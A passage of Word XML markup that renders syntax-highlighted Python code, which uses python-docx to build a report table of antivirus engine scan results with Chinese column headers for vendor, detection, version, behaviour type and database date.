          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>表格创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">scan_res = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"scans"</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    table = document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</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first_line_cells = table.rows[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>].cells</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测厂商</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>风险确认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>厂商客户端检测版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>恶意代码行为识别类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_line_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>病毒库样本数据记录最新日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scan_res:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        row_cells = table.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().cells</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>detected_get_character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(scan_res[key][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"detected"</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row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(scan_res[key][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"version"</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row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(scan_res[key][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"result"</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row_cells[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">].text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(scan_res[key][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"update"</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r>
      <w:r>
        <w:rPr>
